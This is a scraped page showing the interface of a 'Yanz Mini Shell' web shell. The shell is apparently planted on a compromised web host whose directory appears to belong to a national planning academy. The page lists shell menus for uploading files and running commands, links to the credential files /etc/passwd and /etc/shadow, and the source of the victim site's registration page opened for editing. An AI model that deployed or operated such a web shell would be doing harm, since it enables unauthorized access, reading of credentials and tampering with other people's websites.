Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
naacpd
public_html
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php include("connect.php"); session_start(); $_SESSION['user_name']="napd";; $user_name=$_SESSION['user_name']; ini_set('display_errors','Off'); ini_set('error_reporting', E_ALL ); $status = $_GET['status']; ?> <!DOCTYPE html> <html lang="en"> <head> <title>National Academy for Planning & Development</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="css/custom_css.css"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script> <style> /* Set height of the grid so .sidenav can be 100% (adjust if needed) */ /* .row.content {height: 1500px}*/ /* Set gray background color and 100% height */ .container-fluid { height: 100%; } .sidenav { background-color: #f1f1f1; height: 100%; } /* Set black background color, white text and some padding */ footer { background-color: #555; color: white; margin-top: 0px; padding: 15px; } /* On small screens, set height to 'auto' for sidenav and grid */ @media screen and (max-width: 767px) { .sidenav { height: auto; padding: 15px; } .row.content {height: auto;} } </style> </head> <body> <div class="container-fluid"> <div class="row content"> <link rel='stylesheet prefetch' href='http://ajax.googleapis.com/ajax/libs/jqueryui/1.11.2/themes/smoothness/jquery-ui.css'> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.5.0/css/font-awesome.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/ionicons/2.0.1/css/ionicons.min.css"> <link rel="stylesheet" href="css/stylelogin.css"> <link href='https://fonts.googleapis.com/css?family=Ubuntu:500' rel='stylesheet' type='text/css'> <div class="col-sm-8 sidenav"> <form method="post" action="index.php?title=Admin Panel Login" enctype="multipart/form-data"> <div class="login box"> <div class="login-header" > <h3>National Academy for Planning and Development (NAPD)</h3> <h1 style="margin-top:20px;"><img src="company image/logo.png" width="120" height="120"></h1> </div> <br> <div class="login-form"> <h1 style="text-align:center;">Thank you</h1><br> <h3> <?php if($status==1){ ?> Your registration has been completed. <?php }else{ ?> Your registration incompleted. <a href="https://docs.google.com/forms/d/e/1FAIpQLScjoX5DL3aNHHzLgmtauEPDYH2spEx-rhSv8yaelKAmSZXHsQ/viewform"> Please submit registration information again, click here.</a> <?php } ?> </h3> </div> </div> </form> </div> <style> /* Style the buttons */ /* Style the active class, and buttons on mouse-over */ .active, .btn:hover { background-color: #666; color: #000; } </style> </div> </div> </body> </html>
Free Space : 461904068608 Byte